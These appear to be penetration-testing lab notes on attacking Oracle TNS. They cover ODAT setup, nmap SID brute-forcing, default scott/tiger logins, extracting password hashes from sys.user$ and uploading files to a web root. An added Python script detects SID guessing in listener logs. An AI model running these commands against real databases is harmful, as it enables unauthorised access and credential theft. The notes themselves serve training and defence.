Oracle TNS (1521)
Oracle-Tools-setup.sh
#!/bin/bash
sudo apt-get install libaio1 python3-dev alien python3-pip -y
git clone https://github.com/quentinhardy/odat.git
cd odat/
git submodule init
git submodule update
sudo apt install oracle-instantclient-basic oracle-instantclient-devel oracle-instantclient-sqlplus -y
pip3 install cx_Oracle
sudo apt-get install python3-scapy -y
sudo pip3 install colorlog termcolor pycrypto passlib python-libnmap
sudo pip3 install argcomplete && sudo activate-global-python-argcomplete
Testing ODAT (Oracle Database Attacking Tool)
./odat.py -h
Footprinting using NMAP
sudo nmap -p1521 -sV 10.129.204.235 --open
SID (System Identifier)
A unique name that identifies a particular database instance.
It is an essential part of the connection process, because it identifies the specific database instance the client wants to connect to.
If the client specifies an incorrect SID, the connection attempt will fail.
Bruteforcing SID using NMAP
sudo nmap -p1521 -sV 10.129.204.235 --open --script oracle-sid-brute
ODAT (run all modules i.e. brute sid and user/pass)
./odat.py all -s 10.129.204.235
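A defender-side view of the SID guessing above, as an added example that is not part of the original notes: it scans listener.log for sources whose connection attempts were rejected with TNS-12505 (unknown SID) for several distinct SIDs, and reports whether a valid SID was then accepted. The field layout, the sample lines, the function names and the threshold of 3 are assumptions to adapt to your listener.

```python
import re
from collections import defaultdict

UNKNOWN_SID = "12505"  # TNS-12505: listener does not know the SID in the connect descriptor

# Constructed sample lines (documentation IP ranges), not taken from a real system.
# Assumed layout: TIMESTAMP * CONNECT_DATA * ADDRESS * EVENT * SID * RETURN_CODE
SAMPLE_LOG = """\
15-MAR-2024 10:20:01 * (CONNECT_DATA=(SID=XE)(CID=(PROGRAM=app)(HOST=web01)(USER=svc))) * (ADDRESS=(PROTOCOL=tcp)(HOST=192.0.2.50)(PORT=50112)) * establish * XE * 0
15-MAR-2024 10:21:40 * (CONNECT_DATA=(SID=XEE)(CID=(PROGRAM=app)(HOST=web01)(USER=svc))) * (ADDRESS=(PROTOCOL=tcp)(HOST=192.0.2.50)(PORT=50120)) * establish * XEE * 12505
TNS-12505: TNS:listener does not currently know of SID given in connect descriptor
15-MAR-2024 10:22:31 * (CONNECT_DATA=(SID=ORCL)(CID=(PROGRAM=)(HOST=x)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=198.51.100.7)(PORT=41000)) * establish * ORCL * 12505
15-MAR-2024 10:22:31 * (CONNECT_DATA=(SID=PROD)(CID=(PROGRAM=)(HOST=x)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=198.51.100.7)(PORT=41002)) * establish * PROD * 12505
15-MAR-2024 10:22:32 * (CONNECT_DATA=(SID=TEST)(CID=(PROGRAM=)(HOST=x)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=198.51.100.7)(PORT=41004)) * establish * TEST * 12505
15-MAR-2024 10:22:32 * (CONNECT_DATA=(SID=DB11G)(CID=(PROGRAM=)(HOST=x)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=198.51.100.7)(PORT=41006)) * establish * DB11G * 12505
15-MAR-2024 10:22:33 * (CONNECT_DATA=(SID=XE)(CID=(PROGRAM=)(HOST=x)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=198.51.100.7)(PORT=41008)) * establish * XE * 0
"""

def parse_line(line):
    """Return (source_ip, requested_sid, return_code) for an 'establish' entry, else None."""
    parts = [p.strip() for p in line.split(" * ")]
    if len(parts) != 6 or parts[3] != "establish":
        return None  # error text, service updates, SERVICE_NAME-only lines, etc.
    sid = re.search(r"\(SID=([^)]*)\)", parts[1])
    # Use HOST from ADDRESS (network peer), not the client-supplied HOST inside CID.
    src = re.search(r"\(HOST=([^)]+)\)", parts[2])
    if not (sid and src):
        return None
    return src.group(1), sid.group(1), parts[5]

def sid_guessing_sources(log_text, min_distinct=3):
    """Map each source that was refused >= min_distinct different SIDs to what it tried."""
    rejected, accepted = defaultdict(set), defaultdict(set)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        src, sid, rc = rec
        if rc == UNKNOWN_SID:
            rejected[src].add(sid.upper())
        elif rc == "0":
            accepted[src].add(sid.upper())
    return {
        src: {"rejected": sorted(sids), "accepted": sorted(accepted[src])}
        for src, sids in rejected.items()
        if len(sids) >= min_distinct
    }

if __name__ == "__main__":
    print(sid_guessing_sources(SAMPLE_LOG))
```

A non-empty "accepted" list for a flagged source means the guessing reached a valid SID, so credential attempts against that instance are the next thing to look for.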
Logging in using SQLPlus
sqlplus scott/tiger@10.129.204.235/XE;
Logging in using SQLPlus as sysdba (if the user has the appropriate privileges)
sqlplus scott/tiger@10.129.204.235/XE as sysdba
If SQLPlus shows an error about libsqlplus.so
sudo sh -c "echo /usr/lib/oracle/12.2/client64/lib > /etc/ld.so.conf.d/oracle-instantclient.conf"; sudo ldconfig
Oracle RDBMS Commands
select table_name from all_tables;
select * from user_role_privs;
Oracle RDBMS Extracting Password Hashes
select name, password from sys.user$;
Oracle RDBMS file upload (INTO OUTFILE)
$ echo "Oracle File Upload Test" > testing.txt
$ ./odat.py utlfile -s 10.129.204.235 -d XE -U scott -P tiger --sysdba --putFile C:\\inetpub\\wwwroot testing.txt ./testing.txt
$ curl -X GET http://10.129.204.235/testing.txt
Web root: /var/www/html on Linux, C:\inetpub\wwwroot on Windows.
Try this only if there is a web server.